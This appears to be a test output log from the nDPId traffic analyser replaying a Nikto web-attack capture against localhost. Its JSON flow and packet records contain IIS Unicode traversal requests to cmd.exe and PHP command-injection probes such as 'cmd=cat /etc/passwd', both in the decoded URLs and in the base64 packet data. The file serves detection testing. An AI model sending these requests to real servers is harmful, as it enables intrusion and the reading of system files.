-00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 